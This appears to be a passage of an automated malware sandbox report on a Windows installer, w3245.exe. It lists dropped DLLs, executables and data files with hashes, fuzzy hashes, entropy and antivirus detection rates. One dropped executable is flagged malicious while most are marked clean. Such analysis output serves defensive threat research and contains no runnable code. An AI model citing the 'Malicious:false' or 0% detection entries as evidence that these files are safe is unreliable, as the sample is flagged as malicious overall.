                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2598912
                                                                                                                                                                  Entropy (8bit):6.6049974235008655
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                  MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                  SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                  SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                  SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8581632
                                                                                                                                                                  Entropy (8bit):6.736578346160889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                  MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                  SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                  SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                  SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1053696
                                                                                                                                                                  Entropy (8bit):6.539052666912709
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                  MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                  SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                  SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                  SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):356352
                                                                                                                                                                  Entropy (8bit):6.447802510709224
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                  MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                  SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                  SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                  SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6487736
                                                                                                                                                                  Entropy (8bit):7.518089126573906
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                  MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                  SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                  SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):664064
                                                                                                                                                                  Entropy (8bit):6.953961612144461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                  MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                  SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                  SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                  SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60283
                                                                                                                                                                  Entropy (8bit):4.569551839311306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                  MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                  SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                  SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                  SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):421200
                                                                                                                                                                  Entropy (8bit):6.59808962341698
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                  MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                  SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                  SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                  SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):770384
                                                                                                                                                                  Entropy (8bit):6.908020029901359
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                  MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                  SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                  SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                  SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4567853
                                                                                                                                                                  Entropy (8bit):7.952114001019503
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                                  MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                                  SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                                  SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                                  SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15692672
                                                                                                                                                                  Entropy (8bit):7.995895236161738
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
                                                                                                                                                                  MD5:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                                  SHA1:EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
                                                                                                                                                                  SHA-256:C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
                                                                                                                                                                  SHA-512:80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1986
                                                                                                                                                                  Entropy (8bit):3.7259224395984756
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
                                                                                                                                                                  MD5:3DA2E442D7803E1DADC2E8D8F383B817
                                                                                                                                                                  SHA1:1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
                                                                                                                                                                  SHA-256:5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
                                                                                                                                                                  SHA-512:8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-16"?> <BootstrapperApplicationData xmlns="http://schemas.microsoft.com/wix/2010/BootstrapperApplicationData"> <WixBundleProperties DisplayName="Hebephrenia" LogPathVariable="WixBundleLog" Compressed="no" Id="{946bbfde-2e2c-45ce-9bbb-9a533c53cd88}" UpgradeCode="{8AC96A5B-25D4-4207-AA14-964DF4743FD6}" PerMachine="yes" /> <WixPackageProperties Package="Flotsam" Vital="yes" DisplayName="AppVTemplate" DownloadSize="316416" PackageSize="316416" InstalledSize="
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):180800
                                                                                                                                                                  Entropy (8bit):5.521664858470418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
                                                                                                                                                                  MD5:CA03420E7D92D1E8C8726615879FE50D
                                                                                                                                                                  SHA1:49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
                                                                                                                                                                  SHA-256:501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
                                                                                                                                                                  SHA-512:8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2598912
                                                                                                                                                                  Entropy (8bit):6.6049974235008655
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                  MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                  SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                  SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                  SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8581632
                                                                                                                                                                  Entropy (8bit):6.736578346160889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                  MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                  SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                  SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                  SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1053696
                                                                                                                                                                  Entropy (8bit):6.539052666912709
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                  MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                  SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                  SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                  SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):356352
                                                                                                                                                                  Entropy (8bit):6.447802510709224
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                  MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                  SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                  SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                  SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6487736
                                                                                                                                                                  Entropy (8bit):7.518089126573906
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                  MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                  SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                  SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):664064
                                                                                                                                                                  Entropy (8bit):6.953961612144461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                  MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                  SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                  SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                  SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60283
                                                                                                                                                                  Entropy (8bit):4.569551839311306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                  MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                  SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                  SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                  SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):421200
                                                                                                                                                                  Entropy (8bit):6.59808962341698
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                  MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                  SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                  SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                  SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):770384
                                                                                                                                                                  Entropy (8bit):6.908020029901359
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                  MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                  SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                  SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                  SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4567853
                                                                                                                                                                  Entropy (8bit):7.952114001019503
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                                  MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                                  SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                                  SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                                  SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.995926722079058
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:w3245.exe
                                                                                                                                                                  File size:15'806'278 bytes
                                                                                                                                                                  MD5:e92b4d3ee13da899ea0ad5b54a0094ed
